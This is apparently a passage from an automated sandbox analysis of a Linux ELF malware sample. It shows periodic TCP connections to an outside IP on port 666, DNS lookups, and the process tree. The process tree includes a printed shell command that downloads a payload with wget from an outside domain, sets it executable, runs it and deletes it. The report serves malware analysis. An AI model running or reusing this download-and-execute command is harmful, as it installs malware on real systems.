            May 10, 2025 07:44:17.031069994 CEST6665815492.60.77.69192.168.2.15
            May 10, 2025 07:44:31.764678955 CEST58156666192.168.2.1592.60.77.69
            May 10, 2025 07:44:32.037488937 CEST6665815692.60.77.69192.168.2.15
            May 10, 2025 07:44:32.037683964 CEST58156666192.168.2.1592.60.77.69
            May 10, 2025 07:44:32.037794113 CEST58156666192.168.2.1592.60.77.69
            May 10, 2025 07:44:32.310486078 CEST6665815692.60.77.69192.168.2.15
            May 10, 2025 07:44:32.310592890 CEST6665815692.60.77.69192.168.2.15
            May 10, 2025 07:44:32.310615063 CEST6665815692.60.77.69192.168.2.15
            May 10, 2025 07:44:32.310807943 CEST58156666192.168.2.1592.60.77.69
            May 10, 2025 07:44:32.583743095 CEST6665815692.60.77.69192.168.2.15
            May 10, 2025 07:44:47.321472883 CEST58158666192.168.2.1592.60.77.69
            May 10, 2025 07:44:47.594367981 CEST6665815892.60.77.69192.168.2.15
            May 10, 2025 07:44:47.594769955 CEST58158666192.168.2.1592.60.77.69
            May 10, 2025 07:44:47.594854116 CEST58158666192.168.2.1592.60.77.69
            May 10, 2025 07:44:47.867763996 CEST6665815892.60.77.69192.168.2.15
            May 10, 2025 07:44:47.867826939 CEST6665815892.60.77.69192.168.2.15
            May 10, 2025 07:44:47.867847919 CEST6665815892.60.77.69192.168.2.15
            May 10, 2025 07:44:47.868309021 CEST58158666192.168.2.1592.60.77.69
            May 10, 2025 07:44:48.141204119 CEST6665815892.60.77.69192.168.2.15
            May 10, 2025 07:45:02.881206036 CEST58160666192.168.2.1592.60.77.69
            May 10, 2025 07:45:03.154113054 CEST6665816092.60.77.69192.168.2.15
            May 10, 2025 07:45:03.154401064 CEST58160666192.168.2.1592.60.77.69
            May 10, 2025 07:45:03.154401064 CEST58160666192.168.2.1592.60.77.69
            May 10, 2025 07:45:03.427537918 CEST6665816092.60.77.69192.168.2.15
            May 10, 2025 07:45:03.427653074 CEST6665816092.60.77.69192.168.2.15
            May 10, 2025 07:45:03.427691936 CEST6665816092.60.77.69192.168.2.15
            May 10, 2025 07:45:03.428067923 CEST58160666192.168.2.1592.60.77.69
            May 10, 2025 07:45:03.701347113 CEST6665816092.60.77.69192.168.2.15
            May 10, 2025 07:45:18.440821886 CEST58162666192.168.2.1592.60.77.69
            May 10, 2025 07:45:18.713789940 CEST6665816292.60.77.69192.168.2.15
            May 10, 2025 07:45:18.714137077 CEST58162666192.168.2.1592.60.77.69
            May 10, 2025 07:45:18.714205027 CEST58162666192.168.2.1592.60.77.69
            May 10, 2025 07:45:18.988080978 CEST6665816292.60.77.69192.168.2.15
            May 10, 2025 07:45:18.988147974 CEST6665816292.60.77.69192.168.2.15
            May 10, 2025 07:45:18.988184929 CEST6665816292.60.77.69192.168.2.15
            May 10, 2025 07:45:18.988380909 CEST58162666192.168.2.1592.60.77.69
            May 10, 2025 07:45:19.261365891 CEST6665816292.60.77.69192.168.2.15
            May 10, 2025 07:45:34.000946999 CEST58164666192.168.2.1592.60.77.69
            May 10, 2025 07:45:34.273699999 CEST6665816492.60.77.69192.168.2.15
            May 10, 2025 07:45:34.274045944 CEST58164666192.168.2.1592.60.77.69
            May 10, 2025 07:45:34.274219990 CEST58164666192.168.2.1592.60.77.69
            May 10, 2025 07:45:34.546988964 CEST6665816492.60.77.69192.168.2.15
            May 10, 2025 07:45:34.547049999 CEST6665816492.60.77.69192.168.2.15
            May 10, 2025 07:45:34.547090054 CEST6665816492.60.77.69192.168.2.15
            May 10, 2025 07:45:34.547388077 CEST58164666192.168.2.1592.60.77.69
            May 10, 2025 07:45:34.820163012 CEST6665816492.60.77.69192.168.2.15
            May 10, 2025 07:45:49.561950922 CEST58166666192.168.2.1592.60.77.69
            May 10, 2025 07:45:49.835043907 CEST6665816692.60.77.69192.168.2.15
            May 10, 2025 07:45:49.835433006 CEST58166666192.168.2.1592.60.77.69
            May 10, 2025 07:45:49.835535049 CEST58166666192.168.2.1592.60.77.69
            May 10, 2025 07:45:50.109184027 CEST6665816692.60.77.69192.168.2.15
            May 10, 2025 07:45:50.109342098 CEST6665816692.60.77.69192.168.2.15
            May 10, 2025 07:45:50.109462976 CEST6665816692.60.77.69192.168.2.15
            May 10, 2025 07:45:50.110023022 CEST58166666192.168.2.1592.60.77.69
            May 10, 2025 07:45:50.383359909 CEST6665816692.60.77.69192.168.2.15
            May 10, 2025 07:46:05.124607086 CEST58168666192.168.2.1592.60.77.69
            May 10, 2025 07:46:05.397486925 CEST6665816892.60.77.69192.168.2.15
            May 10, 2025 07:46:05.397910118 CEST58168666192.168.2.1592.60.77.69
            May 10, 2025 07:46:05.397910118 CEST58168666192.168.2.1592.60.77.69
            May 10, 2025 07:46:05.672142982 CEST6665816892.60.77.69192.168.2.15
            May 10, 2025 07:46:05.672210932 CEST6665816892.60.77.69192.168.2.15
            May 10, 2025 07:46:05.672337055 CEST6665816892.60.77.69192.168.2.15
            May 10, 2025 07:46:05.672616005 CEST58168666192.168.2.1592.60.77.69
            May 10, 2025 07:46:05.945569038 CEST6665816892.60.77.69192.168.2.15
            May 10, 2025 07:46:20.684933901 CEST58170666192.168.2.1592.60.77.69
            May 10, 2025 07:46:20.957731962 CEST6665817092.60.77.69192.168.2.15
            May 10, 2025 07:46:20.958200932 CEST58170666192.168.2.1592.60.77.69
            May 10, 2025 07:46:20.958200932 CEST58170666192.168.2.1592.60.77.69
            May 10, 2025 07:46:21.231528044 CEST6665817092.60.77.69192.168.2.15
            May 10, 2025 07:46:21.231591940 CEST6665817092.60.77.69192.168.2.15
            May 10, 2025 07:46:21.231632948 CEST6665817092.60.77.69192.168.2.15
            May 10, 2025 07:46:21.231873035 CEST58170666192.168.2.1592.60.77.69
            May 10, 2025 07:46:21.505512953 CEST6665817092.60.77.69192.168.2.15
            May 10, 2025 07:46:36.242144108 CEST58172666192.168.2.1592.60.77.69
            May 10, 2025 07:46:36.515978098 CEST6665817292.60.77.69192.168.2.15
            May 10, 2025 07:46:36.516330004 CEST58172666192.168.2.1592.60.77.69
            May 10, 2025 07:46:36.516330957 CEST58172666192.168.2.1592.60.77.69
            May 10, 2025 07:46:36.788934946 CEST6665817292.60.77.69192.168.2.15
            May 10, 2025 07:46:36.789042950 CEST6665817292.60.77.69192.168.2.15
            May 10, 2025 07:46:36.789079905 CEST6665817292.60.77.69192.168.2.15
            May 10, 2025 07:46:36.789333105 CEST58172666192.168.2.1592.60.77.69
            May 10, 2025 07:46:37.061930895 CEST6665817292.60.77.69192.168.2.15
            May 10, 2025 07:46:51.803335905 CEST58174666192.168.2.1592.60.77.69
            May 10, 2025 07:46:52.076136112 CEST6665817492.60.77.69192.168.2.15
            May 10, 2025 07:46:52.076642036 CEST58174666192.168.2.1592.60.77.69
            May 10, 2025 07:46:52.076642036 CEST58174666192.168.2.1592.60.77.69
            May 10, 2025 07:46:52.349442959 CEST6665817492.60.77.69192.168.2.15
            May 10, 2025 07:46:52.349507093 CEST6665817492.60.77.69192.168.2.15
            May 10, 2025 07:46:52.349544048 CEST6665817492.60.77.69192.168.2.15
            May 10, 2025 07:46:52.349819899 CEST58174666192.168.2.1592.60.77.69
            May 10, 2025 07:46:52.622622967 CEST6665817492.60.77.69192.168.2.15
            May 10, 2025 07:47:07.358772993 CEST58176666192.168.2.1592.60.77.69
            May 10, 2025 07:47:07.631779909 CEST6665817692.60.77.69192.168.2.15
            May 10, 2025 07:47:07.632379055 CEST58176666192.168.2.1592.60.77.69
            May 10, 2025 07:47:07.632380009 CEST58176666192.168.2.1592.60.77.69
            May 10, 2025 07:47:07.905200005 CEST6665817692.60.77.69192.168.2.15
            May 10, 2025 07:47:07.905257940 CEST6665817692.60.77.69192.168.2.15
            May 10, 2025 07:47:07.905293941 CEST6665817692.60.77.69192.168.2.15
            May 10, 2025 07:47:07.905525923 CEST58176666192.168.2.1592.60.77.69
            May 10, 2025 07:47:08.177964926 CEST6665817692.60.77.69192.168.2.15
            May 10, 2025 07:47:22.914951086 CEST58178666192.168.2.1592.60.77.69
            May 10, 2025 07:47:23.187753916 CEST6665817892.60.77.69192.168.2.15
            May 10, 2025 07:47:23.188324928 CEST58178666192.168.2.1592.60.77.69
            May 10, 2025 07:47:23.188325882 CEST58178666192.168.2.1592.60.77.69
            May 10, 2025 07:47:23.460969925 CEST6665817892.60.77.69192.168.2.15
            May 10, 2025 07:47:23.461040020 CEST6665817892.60.77.69192.168.2.15
            May 10, 2025 07:47:23.461075068 CEST6665817892.60.77.69192.168.2.15
            May 10, 2025 07:47:23.461451054 CEST58178666192.168.2.1592.60.77.69
            May 10, 2025 07:47:23.733936071 CEST6665817892.60.77.69192.168.2.15
            May 10, 2025 07:47:38.470112085 CEST58180666192.168.2.1592.60.77.69
            May 10, 2025 07:47:38.743745089 CEST6665818092.60.77.69192.168.2.15
            May 10, 2025 07:47:38.744584084 CEST58180666192.168.2.1592.60.77.69
            May 10, 2025 07:47:38.744584084 CEST58180666192.168.2.1592.60.77.69
            May 10, 2025 07:47:39.017715931 CEST6665818092.60.77.69192.168.2.15
            May 10, 2025 07:47:39.017776966 CEST6665818092.60.77.69192.168.2.15
            May 10, 2025 07:47:39.017797947 CEST6665818092.60.77.69192.168.2.15
            May 10, 2025 07:47:39.018165112 CEST58180666192.168.2.1592.60.77.69
            May 10, 2025 07:47:39.291537046 CEST6665818092.60.77.69192.168.2.15

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            May 10, 2025 07:44:16.274662971 CEST4525753192.168.2.151.1.1.1
            May 10, 2025 07:44:16.274662971 CEST5288153192.168.2.151.1.1.1
            May 10, 2025 07:44:16.427459955 CEST53528811.1.1.1192.168.2.15
            May 10, 2025 07:44:16.428023100 CEST5288153192.168.2.151.1.1.1
            May 10, 2025 07:44:16.438735962 CEST53452571.1.1.1192.168.2.15
            May 10, 2025 07:44:16.439112902 CEST4525753192.168.2.151.1.1.1
            May 10, 2025 07:44:16.569334984 CEST53528811.1.1.1192.168.2.15
            May 10, 2025 07:44:16.580815077 CEST53452571.1.1.1192.168.2.15
            May 10, 2025 07:46:58.477360964 CEST3498353192.168.2.151.1.1.1
            May 10, 2025 07:46:58.477360964 CEST5910653192.168.2.151.1.1.1
            May 10, 2025 07:46:58.640743971 CEST53591061.1.1.1192.168.2.15
            May 10, 2025 07:46:58.652348995 CEST53349831.1.1.1192.168.2.15

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            May 10, 2025 07:44:16.274662971 CEST192.168.2.151.1.1.10xd316Standard query (0)gay.energyA (IP address)IN (0x0001)false
            May 10, 2025 07:44:16.274662971 CEST192.168.2.151.1.1.10xd33dStandard query (0)gay.energy28IN (0x0001)false
            May 10, 2025 07:44:16.428023100 CEST192.168.2.151.1.1.10xd33dStandard query (0)gay.energy28IN (0x0001)false
            May 10, 2025 07:44:16.439112902 CEST192.168.2.151.1.1.10xd316Standard query (0)gay.energyA (IP address)IN (0x0001)false
            May 10, 2025 07:46:58.477360964 CEST192.168.2.151.1.1.10x9c84Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
            May 10, 2025 07:46:58.477360964 CEST192.168.2.151.1.1.10xf884Standard query (0)daisy.ubuntu.com28IN (0x0001)false

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            May 10, 2025 07:44:16.427459955 CEST1.1.1.1192.168.2.150xd33dName error (3)gay.energynonenone28IN (0x0001)false
            May 10, 2025 07:44:16.438735962 CEST1.1.1.1192.168.2.150xd316Name error (3)gay.energynonenoneA (IP address)IN (0x0001)false
            May 10, 2025 07:44:16.569334984 CEST1.1.1.1192.168.2.150xd33dName error (3)gay.energynonenone28IN (0x0001)false
            May 10, 2025 07:44:16.580815077 CEST1.1.1.1192.168.2.150xd316Name error (3)gay.energynonenoneA (IP address)IN (0x0001)false
            May 10, 2025 07:46:58.652348995 CEST1.1.1.1192.168.2.150x9c84No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
            May 10, 2025 07:46:58.652348995 CEST1.1.1.1192.168.2.150x9c84No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

            System Behavior

            General

            Start time (UTC):05:44:14
            Start date (UTC):10/05/2025
            Path:/tmp/x86.elf
            Arguments:/tmp/x86.elf
            File size:136901 bytes
            MD5 hash:b1a9dfc6e42c89e400efad9451540b1e

            Chronological Activities


            General

            Start time (UTC):05:44:14
            Start date (UTC):10/05/2025
            Path:/tmp/x86.elf
            Arguments:-
            File size:136901 bytes
            MD5 hash:b1a9dfc6e42c89e400efad9451540b1e

            Chronological Activities


            General

            Start time (UTC):05:44:14
            Start date (UTC):10/05/2025
            Path:/bin/sh
            Arguments:/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Chronological Activities


            General

            Start time (UTC):05:44:14
            Start date (UTC):10/05/2025
            Path:/bin/sh
            Arguments:-
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Chronological Activities


            General

            Start time (UTC):05:44:14
            Start date (UTC):10/05/2025
            Path:/usr/bin/wget
            Arguments:wget -q http://gay.energy/.../vivid -O .....
            File size:548568 bytes
            MD5 hash:996940118df7bb2aaa718589d4e95c08

            Chronological Activities


            General

            Start time (UTC):05:44:15
            Start date (UTC):10/05/2025
            Path:/bin/sh
            Arguments:-
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Chronological Activities


            General

            Start time (UTC):05:44:15
            Start date (UTC):10/05/2025
            Path:/usr/bin/chmod
            Arguments:chmod 777 .....
            File size:63864 bytes
            MD5 hash:739483b900c045ae1374d6f53a86a279

            Chronological Activities


            General

            Start time (UTC):05:44:15
            Start date (UTC):10/05/2025
            Path:/bin/sh
            Arguments:-
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Chronological Activities


            General

            Start time (UTC):05:44:15
            Start date (UTC):10/05/2025
            Path:/bin/sh
            Arguments:/bin/sh ./.....
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Chronological Activities


            General

            Start time (UTC):05:44:15
            Start date (UTC):10/05/2025
            Path:/bin/sh
            Arguments:-
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Chronological Activities


            General

            Start time (UTC):05:44:15
            Start date (UTC):10/05/2025
            Path:/usr/bin/rm
            Arguments:rm -rf .....
            File size:72056 bytes
            MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

            Chronological Activities


            General

            Start time (UTC):05:44:14
            Start date (UTC):10/05/2025
            Path:/tmp/x86.elf
            Arguments:-
            File size:136901 bytes
            MD5 hash:b1a9dfc6e42c89e400efad9451540b1e

            Chronological Activities


            General

            Start time (UTC):05:44:14
            Start date (UTC):10/05/2025
            Path:/tmp/x86.elf
            Arguments:-
            File size:136901 bytes
            MD5 hash:b1a9dfc6e42c89e400efad9451540b1e

            Chronological Activities


            General

            Start time (UTC):05:44:14
            Start date (UTC):10/05/2025
            Path:/tmp/x86.elf
            Arguments:-
            File size:136901 bytes
            MD5 hash:b1a9dfc6e42c89e400efad9451540b1e

            Chronological Activities